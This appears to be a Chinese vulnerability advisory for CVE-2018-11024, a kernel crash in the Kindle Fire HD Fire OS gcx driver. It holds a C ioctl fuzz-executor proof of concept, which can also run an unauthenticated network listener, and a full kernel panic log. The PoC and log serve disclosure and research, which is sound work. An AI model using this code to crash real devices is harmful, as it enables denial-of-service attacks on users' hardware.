(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞


一、漏洞简介

Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3 内核组件中的内核模块 /omap/drivers/misc/gcx/gcioctl/gcif.c 存在安全漏洞:攻击者可以对设备 /dev/gcioctl 发起命令号为 1077435789 的 ioctl 调用,并在其参数中注入特制数据,从而导致内核崩溃。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc

#include<stdio.h>
#include<string.h> //strlen
#include<sys/socket.h>
#include<arpa/inet.h> //inet_addr
#include<unistd.h> //write
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <stdbool.h>

// Socket boilerplate code taken from here: http://www.binarytides.com/server-client-example-c-sockets-linux/

/*
Layout of one test message, in the order main() parses it:
seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, map_entry_t_arr, blob_len_arr, blobs
*/
/* Non-zero makes main() dump the parsed message before it issues the ioctl. */
int debug = 1;

/*
 * One pointer-fixup record from the message's mapping array.
 * main() uses src_id as an index into the blob array and writes a pointer
 * at byte `offset` inside that blob.  A negative dst_id marks a generic
 * buffer whose element size is -dst_id; otherwise dst_id is the index of
 * the blob the pointer should refer to.
 */
typedef struct {
    int src_id;
    int dst_id;
    int offset;
} map_entry_t;

/* Fixed table of 18 boundary values used for 2-byte elements. */
short tiny_vals[18] = {
    128, 127, 64, 63, 32, 31,
    16, 15, 8, 7, 4, 3,
    2, 1, 0, 256, 255, -1
};

/* Boundary-value table built by populate_arrs() and its entry count. */
int *small_vals;
int num_small_vals;

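/*
 * Build the global small_vals table of boundary values for `top` and set
 * num_small_vals to its entry count.
 *
 * Table layout, in order: starting at half of the first power of two that
 * is >= top and halving down to 2, the pair (p, p - 1) for each power p;
 * then 0, top, top - 1 and -1.  For top = 8 the table is
 * {4, 3, 2, 1, 0, 8, 7, -1}.
 *
 * Changes from the original: the table is zero-initialised over its full
 * size (the old memset cleared only `count` bytes, not `count` ints), the
 * allocation is checked, a table left by an earlier call is released, and
 * top <= 1 no longer writes four entries into a two-entry allocation.
 *
 * top is expected to stay at or below 2^30: the doubling loop shifts a
 * signed int and would overflow beyond that.
 * Exits the process if the table cannot be allocated.
 */
void populate_arrs(int top) {
    int num = 1;
    int count = 0;

    /* Two slots (p and p - 1) for every doubling needed to reach top. */
    while (num < top) {
        num <<= 1;
        count += 2;
    }
    /* One slot for top and one for -1. */
    count += 2;

    /*
     * The tail below always stores four entries (0, top, top - 1, -1).
     * When the loop above never ran (top <= 1) the computed count is only
     * two, so widen it to keep those stores inside the allocation.
     */
    if (count < 4) {
        count = 4;
    }
    num >>= 1;

    int *table = calloc((size_t)count, sizeof *table);
    if (table == NULL) {
        printf("Failed to allocate small_vals\n");
        exit(-1);
    }

    int i = 0;
    while (num > 1) {
        table[i++] = num;
        table[i++] = num - 1;
        num >>= 1;
    }
    table[i] = 0;
    table[i + 1] = top;
    table[i + 2] = top - 1;
    table[i + 3] = -1;

    /* free(NULL) is a no-op, so the first call needs no special case. */
    free(small_vals);
    small_vals = table;
    num_small_vals = count;
}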

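/*
 * Fill `size` bytes at elem with a generated value.
 *
 * With a chance of small_weight percent the value comes from a boundary
 * table: tiny_vals for size 2, small_vals for sizes 4 and 8.  Any other
 * size on that path is reported and the process exits.  Otherwise each of
 * the `size` bytes is drawn separately from rand().
 *
 * The number and order of rand() calls is kept exactly as before (one draw
 * for the percentage, one for the small_vals index, and a further one for
 * the tiny_vals index when size is 2).  main() seeds the generator from the
 * message, so replaying a saved message depends on this sequence.
 *
 * Changes from the original: values are stored with memcpy instead of
 * through casted pointers, so elem does not have to be aligned for the
 * element type; the "Choosing" line now prints the value that is actually
 * stored (for size 2 it used to print a small_vals entry while storing a
 * tiny_vals entry); an empty small_vals table is reported instead of
 * dividing by zero.
 *
 * elem must point to at least `size` writable bytes.
 */
void gen_rand_val(int size, char *elem, int small_weight) {
    if ((rand() % 100) < small_weight) {
        if (num_small_vals <= 0) {
            printf("small_vals is empty; populate_arrs must run first\n");
            exit(-1);
        }

        /* Drawn for every size so the rand() sequence does not change. */
        unsigned int idx = (rand() % num_small_vals);

        switch (size) {
        case 2: {
            idx = (rand() % 18);
            short picked = tiny_vals[idx];
            printf("Choosing %d\n", picked);
            memcpy(elem, &picked, sizeof picked);
            break;
        }
        case 4: {
            int picked = small_vals[idx];
            printf("Choosing %d\n", picked);
            memcpy(elem, &picked, sizeof picked);
            break;
        }
        case 8: {
            /* Widened with sign extension, as the original assignment did. */
            long long picked = small_vals[idx];
            printf("Choosing %d\n", small_vals[idx]);
            memcpy(elem, &picked, sizeof picked);
            break;
        }
        default:
            printf("Damn bro. Size: %d\n", size);
            exit(-1);
        }
    } else {
        for (int i = 0; i < size; i++) {
            elem[i] = (char)(rand() % 0x100);
        }
    }
}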

/*
 * Test-case executor.  Takes one serialized test case, rebuilds the ioctl
 * argument in memory (blobs plus pointer fixups), opens the device named in
 * the message and issues a single ioctl with the first blob as argument.
 *
 * Two paths exist in the code:
 *  - replay (retest != 0, which is the hard-coded value): the socket setup
 *    is skipped, the test case is read from /sdcard/saved, the ioctl is
 *    issued once and the process exits;
 *  - server (retest == 0): listen on the TCP port given in argv[1]; every
 *    length-prefixed message is saved to /sdcard/saved, executed, and
 *    acknowledged by writing its 4-byte length back to the client.
 *
 * Returns 1 when bind or accept fails, 0 after a recv error; most other
 * failures call exit(-1).
 *
 * NOTE(review): every length, count, index and offset in the message is used
 * as received.  Nothing is checked against the message size or the blob
 * sizes, so a malformed message makes this process read or write outside
 * its own buffers.  The server path binds to INADDR_ANY and no peer
 * authentication is visible in this file.
 */
int main(int argc , char *argv[])
{
int num_blobs = 0, num_mappings = 0, i = 0, dev_name_len = 0, j;
unsigned int ioctl_id = 0;
char *dev_name;
// NOTE(review): never used; the fixup loop declares its own `tmp`, which shadows this one
void *tmp;
// ptr_arr[k] is the heap copy of blob k, len_arr[k] its length in bytes
char **ptr_arr;
int *len_arr;
unsigned int seed;

int sockfd , client_sock , c , read_size;
struct sockaddr_in server , client;
int msg_size;
// generic buffers allocated during pointer fixup, kept here so they can be freed; fixed capacity of 264
void *generic_arr[264];

// max val for small_vals array
int top = 8192;
// running number printed in front of each ioctl call
int cnt = 0;
// chance that our generics are filled with "small vals"
int default_weight = 50;
populate_arrs(top);
// replay switch: non-zero makes the goto below skip the whole socket server
int retest = 1;
// NOTE(review): this jumps into the body of the while loop further down, past `msg_size = 0`
// and past the declaration of recv_buf; msg_size is therefore still uninitialized when the
// rerun block uses it as an allocation size.
goto rerun;



// ---- server path: not reached while retest is non-zero ----
sockfd = socket(AF_INET , SOCK_STREAM , 0);
if (sockfd == -1)
{
// NOTE(review): the failure is only reported; execution continues with sockfd == -1
printf("Could not create socket");
}
puts("Socket created");

// allow the port to be re-bound right after a restart; the return value is not checked
setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));

// accept connections on every local interface, port taken from the first argument
// NOTE(review): argv[1] is read without checking argc, and atoi reports no conversion errors
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(atoi(argv[1]));

//Bind
if( bind(sockfd,(struct sockaddr *)&server , sizeof(server)) < 0)
{
//print the error message
perror("bind failed. Error");
return 1;
}
puts("bind done");
// re-entered via `goto listen` after a client disconnects
listen:
// Listen
listen(sockfd , 3);

puts("Waiting for incoming connections...");
c = sizeof(struct sockaddr_in);

// accept connection from an incoming client
client_sock = accept(sockfd, (struct sockaddr *)&client, (socklen_t*)&c);
if (client_sock < 0)
{
perror("accept failed");
return 1;
}
puts("Connection accepted");

msg_size = 0;
// Receive a message from client
// framing: a 4-byte length copied straight into msg_size, then that many payload bytes
// NOTE(review): the length is used as received (no upper bound, may be negative), and a
// read of fewer than 4 bytes is not detected
while( (read_size = recv(client_sock , &msg_size , 4 , 0)) > 0 )
{
// recv the entire message
char *recv_buf = calloc(msg_size, sizeof(char));
if (recv_buf == NULL) {
printf("Failed to allocate recv_buf\n");
exit(-1);
}

// NOTE(review): a single recv call; if it returns fewer bytes than requested the check below exits
int nrecvd = recv(client_sock, recv_buf, msg_size, 0);
if (nrecvd != msg_size) {
printf("Error getting all data!\n");
printf("nrecvd: %d\nmsg_size:%d\n", nrecvd, msg_size);
exit(-1);
}
// quickly save a copy of the most recent data
// (written and fsync'ed before the message is executed; the replay path reads this file)
int savefd = open("/sdcard/saved", O_WRONLY|O_TRUNC|O_CREAT, 0644);
if (savefd < 0) {
perror("open saved");
exit(-1);
}

int err = write(savefd, recv_buf, msg_size);
if (err != msg_size) {
perror("write saved");
exit(-1);
}
fsync(savefd);
close(savefd);
// replay entry point: reached by the goto at the top of main when retest is set
rerun:
if (retest) {
// NOTE(review): the buffer is sized by msg_size but the read below copies fsize bytes;
// nothing ties the two together, the results of lseek/read are not checked, and this fd
// is never closed
recv_buf = calloc(msg_size, sizeof(char));
int fd = open("/sdcard/saved", O_RDONLY);
if (fd < 0) {
perror("open:");
exit(-1);
}
int fsize = lseek(fd, 0, SEEK_END);
printf("file size: %d\n", fsize);
lseek(fd, 0, SEEK_SET);
read(fd, recv_buf, fsize);
}

// `head` is the parse cursor into the message; it only ever moves forward
char *head = recv_buf;
seed = 0;
//seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, map_entry_t_arr, blob_len_arr, blobs
// fixed header: five consecutive 4-byte fields copied as raw bytes
// NOTE(review): none of these fields is validated against the amount of data actually received
memcpy(&seed, head, 4);
head += 4;
memcpy(&ioctl_id, head, 4);
head += 4;
memcpy(&num_mappings, head, 4);
head += 4;
memcpy(&num_blobs, head, 4);
head += 4;
memcpy(&dev_name_len, head, 4);
head += 4;

// srand with new seed
// (every rand() call below is driven by the seed carried in the message)
srand(seed);

/* dev name */
// one extra zeroed byte from calloc keeps the copied name NUL-terminated
dev_name = calloc(dev_name_len+1, sizeof(char));
if (dev_name == NULL) {
printf("Failed to allocate dev_name\n");
exit(-1);
}
memcpy(dev_name, head, dev_name_len);
head += dev_name_len;

/* map */
// array of pointer-fixup records, copied verbatim from the message
map_entry_t *map = calloc(num_mappings, sizeof(map_entry_t));
if (map == NULL) {
printf("Failed to allocate map\n");
exit(-1);
}

if (num_mappings != 0) {
memcpy(map, head, num_mappings*sizeof(map_entry_t));
head += num_mappings*sizeof(map_entry_t);
}

/* blobs */

// first create an array to store the sizes themselves
len_arr = calloc(num_blobs, sizeof(int));
if (len_arr == NULL) {
printf("Failed to allocate len_arr\n");
exit(-1);
}

// we'll also want an array to store our pointers
ptr_arr = calloc(num_blobs, sizeof(void *));
if (ptr_arr == NULL) {
printf("Failed to allocate ptr_arr\n");
exit(-1);
}


// copy the blob sizes into our size_arr
for (j=0; j < num_blobs; j++) {
memcpy(&len_arr[j], head, sizeof(int));
head += sizeof(int);
}

// we'll also want memory bufs for all blobs
// now that we have the sizes, allocate all the buffers we need
for (j=0; j < num_blobs; j++) {
ptr_arr[j] = calloc(len_arr[j], sizeof(char));
printf("Sizeof(ptr_arr[%d])=%d\n", j, len_arr[j]);
printf("ptr_arr[%d]=%p\n", j, ptr_arr[j]);

//printf("just added %p to ptr_arr\n", ptr_arr[j]);
if (ptr_arr[j] == NULL) {
printf("Failed to allocate a blob store\n");
exit(-1);
}

// might as well copy the memory over as soon as we allocate the space
memcpy((char *)ptr_arr[j], head, len_arr[j]);
// dump the blob as 4-byte words
// NOTE(review): when the length is not a multiple of 4 the last read runs past the blob
printf("ptr_arr[%d]=\n", j);
for(i=0;i<len_arr[j];i+=4){
printf("0x%08x\n", *(unsigned int *)(ptr_arr[j] + i));
}
printf("\n");

head += len_arr[j];
}

// number of entries used in generic_arr
int num_generics = 0;

// time for pointer fixup
// each record patches one pointer-sized slot inside blob src_id at byte `offset`
// NOTE(review): src_id, dst_id and offset come from the message and are not range-checked
for (i=0; i < num_mappings; i++) {
// get out entry
map_entry_t entry = map[i];
// pull out the struct to be fixed up
char *tmp = ptr_arr[entry.src_id];

// check if this is a struct ptr or just a generic one

// just a generic one
if (entry.dst_id < 0) {
// 90% chance we fixup the generic
if ( (rand() % 10) > 0) {
// fresh zeroed 128-byte buffer; NOTE(review): the malloc result is not checked
int buf_len = 128;
char *tmp_generic = malloc(buf_len);
memset(tmp_generic, 0, buf_len);
// NOTE(review): the original comment said "95% chance we fill it with data", but the
// condition below holds only for draws 96..99, i.e. about 4%
if ((rand() % 100) > 95) {
// if dst_id is < 0, it's abs value is the element size
int size = -1 * entry.dst_id;
int weight;
// if it's a char or some float, never choose a "small val"
if (size == 1 || size > 8)
weight = 0;
else
weight = default_weight;

// NOTE(review): this loop reuses `i`, the counter of the enclosing fixup loop, so the
// outer loop resumes from the value left here; also, when size does not divide
// buf_len the last element is written past the end of the buffer
for (i=0; i < buf_len; i+=size) {
gen_rand_val(size, &tmp_generic[i], weight);
}
}
// remember the buffer for cleanup and store its address into the blob
generic_arr[num_generics] = tmp_generic;
memcpy(tmp+entry.offset, &tmp_generic, sizeof(void *));
num_generics += 1;
// checked after the store, so the process exits before a 265th entry could be written
if (num_generics >= 264) {
printf("Code a better solution for storing generics\n");
exit(1);
}
}
}

// a struct ptr, so we have the data
else {
// 1 in 400 chance we don't fixup
if ( (rand() % 400) > 0) {
// now point it to the correct struct/blob
// printf("placing %p, at %p\n", ptr_arr[entry.dst_id], tmp+entry.offset);
memcpy(tmp+entry.offset, &ptr_arr[entry.dst_id], sizeof(void *));
}
}
}

if (debug) {
// header fields, then five `unsigned long` words read from the start of blob 0
// NOTE(review): the addresses printed are computed from &ptr_arr[0] (the pointer array),
// while the values are read from the bytes of blob 0, so the two columns do not correspond;
// the reads ignore len_arr[0] and assume at least one blob exists
printf("ioctl_id: %d\n", ioctl_id);
printf("num_mappings: %d\n", num_mappings);
printf("num_blobs: %d\n", num_blobs);
printf("dev_name_len: %d\n", dev_name_len);
printf("dev_name: %s\n", dev_name);
printf("data[]: \n");
//printf("(0x%x)\n", *(int *)&ptr_arr[0]);
printf("(0x%p) : ", &ptr_arr[0]);
printf("(0x%016lx)\n", *(unsigned long int *)ptr_arr[0]);
printf("(0x%p) : ", (&ptr_arr[0]+1*8));
printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+1*8));

printf("(0x%p) : ", (&ptr_arr[0]+2*8));
printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+2*8));

printf("(0x%p) : ", (&ptr_arr[0]+3*8));
printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+3*8));

printf("(0x%p) : ", (&ptr_arr[0]+4*8));
printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+4*8));

//printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+5*8));
//printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+6*8));

//printf("(0x%x)\n", (int *)ptr_arr, (int *)ptr_arr);

}

// time for the actual ioctl
// the device path is whatever name the message carried
//printf("Try to open device %s\n", dev_name);
//fflush(stdout);
int fd = open(dev_name, O_RDONLY);
if (fd < 0) {
perror("open");
exit(-1);
} else {
printf("Open devicd %s successfully.\n", dev_name);
}

//fflush(stdout);
//printf("Try to call ioctl(fd=%d, ioctl_id=%d, ptr_arr[0]=%p)\n", fd, ioctl_id, ptr_arr[0]);
// flush first so earlier output is not lost if the call below takes the system down
fflush(stdout);
printf("%10d:", cnt++);
// blob 0 is the ioctl argument; "good hit" only means the call did not return -1
// NOTE(review): <sys/ioctl.h> is not in this file's include list, so no prototype for ioctl is visible here
if ((ioctl(fd, ioctl_id, ptr_arr[0])) == -1)
perror("ioctl");

else
printf("good hit\n");
close(fd);
printf("device %s closed\n", dev_name);

// replay mode runs exactly one test case
if (retest)
exit(0);

fflush(stdout);
// release everything allocated for this test case
free(recv_buf);
free(dev_name);
if (map != NULL)
free(map);
free(len_arr);
for (i=0; i < num_blobs; i++) {
//printf("%d: free'ing %p\n", i, ptr_arr[i]);
free(ptr_arr[i]);
}
free(ptr_arr);
for (i=0; i < num_generics; i++) {
free(generic_arr[i]);
}

// acknowledge the test case by writing the 4-byte length back; the result of write is not checked
write(client_sock, &msg_size, 4);

msg_size = 0;
}

// recv returned 0: the peer closed the connection, so wait for the next client
if(read_size == 0)
{
puts("Client disconnected");
fflush(stdout);
close(client_sock);
goto listen;
}
else if(read_size == -1)
{
perror("recv failed");
}

return 0;
}

崩溃日志(内核在 c2dm_l1cache 中访问无效虚拟地址 d900000c,调用方为 dev_ioctl,随后内核 panic 并重启)

[  144.428375] Unable to handle kernel paging request at virtual address d900000c
[ 144.436462] pgd = dcac0000
[ 144.439697] [d900000c] *pgd=00000000
[ 144.443939] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[ 144.450012] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[ 144.457672] CPU: 0 Tainted: G O (3.4.83-gd2afc0bae69 #1)
[ 144.465118] PC is at c2dm_l1cache+0x30/0x100
[ 144.469940] LR is at dev_ioctl+0x3f0/0x10c4
[ 144.474670] pc : [<c03187ac>] lr : [<c031782c>] psr: a0000013
[ 144.474670] sp : c2d6be38 ip : 00000000 fp : c2d6be6c
[ 144.487640] r10: 00000000 r9 : d8c0cca8 r8 : 00b8dd90
[ 144.493621] r7 : 00000000 r6 : c2d6bea4 r5 : 00b8dd90 r4 : 388b77c4
[ 144.500915] r3 : d9000004 r2 : 75e0c121 r1 : c2d6bea4 r0 : 00000000
[ 144.508331] Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[ 144.516418] Control: 10c5387d Table: 9cac004a DAC: 00000015
[ 144.522827]
[ 144.522857] PC: 0xc031872c:
[ 144.527954] 872c e51b2034 e592300c eaffffa5 e30c281c e34c209d e5923000 e3530000 1affffbd
[ 144.538482] 874c eaffffc0 e51b303c e51b1040 e2833001 e51b2034 e1530001 e50b303c e2822010
[ 144.549163] 876c e50b2034 1affff8c eaffff83 c09dc81c e1a0c00d e92ddff0 e24cb004 e24dd00c
[ 144.559844] 878c e3500000 e1a07002 e50b0030 da00000d e0814200 e1a06001 e1a03001 e3a02000
[ 144.570404] 87ac e5930008 e593c004 e2833010 e1530004 e022209c 1afffff9 e3520902 3a000003
[ 144.581085] 87cc e3570002 9a000022 e24bd028 e89daff0 e59f9090 e2818008 e3a0a000 e5963008
[ 144.591735] 87ec e5184008 e3530000 13a05000 1a00000a ea000010 e5181004 e5993024 e0841001
[ 144.602416] 880c e12fff33 e5962008 e2855001 e596300c e1550002 e0844003 2a000006 e2572000
[ 144.612976]
[ 144.612976] LR: 0xc03177ac:
[ 144.618072] 77ac ebf55c15 eaffff35 e3053d8d e3443038 e1510003 1affff30 e1a0200d e3c23d7f
[ 144.628631] 77cc e3c3303f e24b0064 e5933008 e2952038 30d22003 33a03000 e3530000 1a0001a8
[ 144.639160] 77ec e1a01005 e3a02038 ebfcfa90 e3500000 1a00000e e51b2030 e3520001 0a0001cb
[ 144.649780] 780c e3520002 0a0001ee e3520000 1a000007 e51b0064 e3a02000 e24b1060 eb0003d3
[ 144.660369] 782c e51b0064 e24b1060 e51b2030 eb000338 e3a05000 eaffff11 e24b1064 e50b1088
[ 144.670776] 784c e51b0088 e3a01010 ebfd03c1 e3a03004 e50b3064 e5963008 e2952004 30d22003
[ 144.681213] 786c 33a03000 e3530000 0a0001c5 e3e0500d eaffff02 e1a0200d e3c26d7f e3c6603f
[ 144.691528] 788c e5963008 e2952008 30d22003 33a03000 e3530000 1a000021 e24b3064 e1a01005
[ 144.701995]
[ 144.701995] SP: 0xc2d6bdb8:
[ 144.706878] bdb8 c2d6be24 00b8dd90 c2d6bdec c2d6bdd0 c00084d0 c03187ac a0000013 ffffffff
[ 144.717407] bdd8 c2d6be24 00b8dd90 c2d6be6c c2d6bdf0 c06a5318 c0008370 00000000 c2d6bea4
[ 144.727905] bdf8 75e0c121 d9000004 388b77c4 00b8dd90 c2d6bea4 00000000 00b8dd90 d8c0cca8
[ 144.738586] be18 00000000 c2d6be6c 00000000 c2d6be38 c031782c c03187ac a0000013 ffffffff
[ 144.749145] be38 c02ba53c 575b4b92 d8578000 00000000 00b8dd90 0000000b dcae46c0 00b8dd90
[ 144.759796] be58 d8c0cca8 00000000 c2d6bf04 c2d6be70 c031782c c0318788 00000001 00000088
[ 144.770355] be78 000ffeff 00000001 c2d6bedc c2d6be90 c0207454 c00bd920 00000027 d7ce5000
[ 144.781005] be98 c2d6bed4 c2d6bea8 575b4b92 4ccba3b5 47a0578f 83b275c7 00000000 00020261
[ 144.791687]
[ 144.791687] FP: 0xc2d6bdec:
[ 144.796661] bdec c0008370 00000000 c2d6bea4 75e0c121 d9000004 388b77c4 00b8dd90 c2d6bea4
[ 144.807189] be0c 00000000 00b8dd90 d8c0cca8 00000000 c2d6be6c 00000000 c2d6be38 c031782c
[ 144.817840] be2c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000 00000000 00b8dd90
[ 144.828399] be4c 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04 c2d6be70 c031782c
[ 144.839080] be6c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc c2d6be90 c0207454
[ 144.849761] be8c c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92 4ccba3b5 47a0578f
[ 144.860290] beac 83b275c7 00000000 00020261 00000000 00000000 00000000 00000000 00000000
[ 144.870971] becc 00000000 00000000 00000000 c02089fc 00000000 dcae46c0 0000000b dcae46c0
[ 144.881652]
[ 144.881652] R1: 0xc2d6be24:
[ 144.886627] be24 c2d6be38 c031782c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000
[ 144.897308] be44 00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04
[ 144.907989] be64 c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc
[ 144.918518] be84 c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92
[ 144.929199] bea4 4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000 00000000
[ 144.939849] bec4 00000000 00000000 00000000 00000000 00000000 c02089fc 00000000 dcae46c0
[ 144.950531] bee4 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08 c0136044
[ 144.961059] bf04 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[ 144.971710]
[ 144.971710] R3: 0xd8ffff84:
[ 144.976623] ff84 d8ffff20 d8efb000 00000707 020e40fb d8efb075 d8ffff3c d8efb01c d8ffffa0
[ 144.987213] ffa4 d8ffffa0 d8efb028 ca9788f0 d8ffffb0 d8ffffb0 00000000 bf06e9c8 80000088
[ 144.997772] ffc4 dd2eac00 dd309540 00000000 00000000 00000000 00000000 00000000 00000000
[ 145.008392] ffe4 00000000 00000000 00000000 00000000 00000000 00000000 00000000 ********
[ 145.018798] 0004 ******** ******** ******** ******** ******** ******** ******** ********
[ 145.029327] 0024 ******** ******** ******** ******** ******** ******** ******** ********
[ 145.039886] 0044 ******** ******** ******** ******** ******** ******** ******** ********
[ 145.050384] 0064 ******** ******** ******** ******** ******** ******** ******** ********
[ 145.060913]
[ 145.060913] R6: 0xc2d6be24:
[ 145.066009] be24 c2d6be38 c031782c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000
[ 145.076568] be44 00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04
[ 145.087219] be64 c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc
[ 145.097900] be84 c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92
[ 145.108459] bea4 4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000 00000000
[ 145.118988] bec4 00000000 00000000 00000000 00000000 00000000 c02089fc 00000000 dcae46c0
[ 145.129638] bee4 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08 c0136044
[ 145.140319] bf04 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[ 145.150848]
[ 145.150848] R9: 0xd8c0cc28:
[ 145.155944] cc28 d8c0cc28 d8c0cc28 00000000 00000000 00000000 c06bc674 000200da c09dda58
[ 145.166503] cc48 00000000 00000000 d8c0cc50 d8c0cc50 00000000 c0aa5174 c0aa5174 c0aa5148
[ 145.177062] cc68 5aefd94b 00000000 00000000 00000000 d8c0cc80 9ad1f453 00000000 00000000
[ 145.187713] cc88 00200000 00000000 00000000 d8c0cc94 d8c0cc94 dd3b56c0 dd3b56c0 00000000
[ 145.198394] cca8 000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
[ 145.208923] ccc8 d8c0cd80 dd3e3e70 00001064 00000001 0fb00000 5aefd94b 2d2b4d13 5aefd94b
[ 145.219573] cce8 2d2b4d13 5aefd94b 2d2b4d13 00000000 00000000 00000000 00000000 00000000
[ 145.230255] cd08 00000000 00000000 00000000 00000000 00000001 00000000 00000000 d8c0cd24
[ 145.240936] Process executor32 (pid: 3810, stack limit = 0xc2d6a2f8)
[ 145.248016] Stack: (0xc2d6be38 to 0xc2d6c000)
[ 145.253082] be20: c02ba53c 575b4b92
[ 145.262176] be40: d8578000 00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000
[ 145.271392] be60: c2d6bf04 c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001
[ 145.280609] be80: c2d6bedc c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8
[ 145.289703] bea0: 575b4b92 4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000
[ 145.298919] bec0: 00000000 00000000 00000000 00000000 00000000 00000000 c02089fc 00000000
[ 145.308105] bee0: dcae46c0 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08
[ 145.317352] bf00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
[ 145.326416] bf20: dcf8c440 c2d6bf0c c2d6a000 00b8dd80 00b8dd90 40385d8d dcae46c0 0000000b
[ 145.335662] bf40: c2d6a000 00000000 c2d6bf64 00000000 00b8dd90 40385d8d dcae46c0 0000000b
[ 145.344879] bf60: c2d6a000 00000000 c2d6bfa4 c2d6bf78 c01365e0 c0135fc4 00000000 00000000
[ 145.354095] bf80: c0013e08 00b8dd80 000121c0 00000000 00000036 c0013e08 00000000 c2d6bfa8
[ 145.363159] bfa0: c0013c60 c0136578 00b8dd80 000121c0 0000000b 40385d8d 00b8dd90 00b8dd90
[ 145.372406] bfc0: 00b8dd80 000121c0 00000000 00000036 00000000 00000000 00000000 bee035f4
[ 145.381622] bfe0: 810100fc bee030f4 00011578 0002b28c 60000010 0000000b 4d6969d9 03020430
[ 145.390686] Backtrace:
[ 145.393829] [<c031877c>] (c2dm_l1cache+0x0/0x100) from [<c031782c>] (dev_ioctl+0x3f0/0x10c4)
[ 145.403228] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[ 145.412658] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[ 145.421874] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[ 145.431304] r8:c0013e08 r7:00000036 r6:00000000 r5:000121c0 r4:00b8dd80
[ 145.439605] Code: e0814200 e1a06001 e1a03001 e3a02000 (e5930008)
[ 145.450225] Board Information:
[ 145.450225] Revision : 0001
[ 145.450256] Serial : 0000000000000000
[ 145.450256] SoC Information:
[ 145.450256] CPU : OMAP4470
[ 145.450286] Rev : ES1.0
[ 145.450286] Type : HS
[ 145.450286] Production ID: 0002B975-000000CC
[ 145.450286] Die ID : 1CC60000-50002FFF-0B00935D-11007004
[ 145.450317]
[ 145.485900] ---[ end trace 0fe3b4c74b4e9fa7 ]---
[ 145.491149] Kernel panic - not syncing: Fatal exception
[ 145.496917] CPU1: stopping
[ 145.500152] Backtrace:
[ 145.503204] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[ 145.512695] r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[ 145.519714] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[ 145.528961] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[ 145.538482] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60)
[ 145.547637] Exception stack(0xd85a5fb0 to 0xd85a5ff8)
[ 145.553466] 5fa0: 41822290 418185e8 00000001 41c95000
[ 145.562561] 5fc0: 418185e8 41687460 4010d0ec 418185e8 4010d038 41689398 7fffffff 401602ec
[ 145.571777] 5fe0: 418191e8 5ba34d10 41609aa8 41609974 200b0010 ffffffff
[ 145.579284] r6:ffffffff r5:200b0010 r4:41609974 r3:41822290
[ 145.586364] CPU0 PC (0) : 0xc003ee38
[ 145.590576] CPU0 PC (1) : 0xc003ee54
[ 145.594635] CPU0 PC (2) : 0xc003ee54
[ 145.598693] CPU0 PC (3) : 0xc003ee54
[ 145.602722] CPU0 PC (4) : 0xc003ee54
[ 145.606781] CPU0 PC (5) : 0xc003ee54
[ 145.610839] CPU0 PC (6) : 0xc003ee54
[ 145.614898] CPU0 PC (7) : 0xc003ee54
[ 145.619110] CPU0 PC (8) : 0xc003ee54
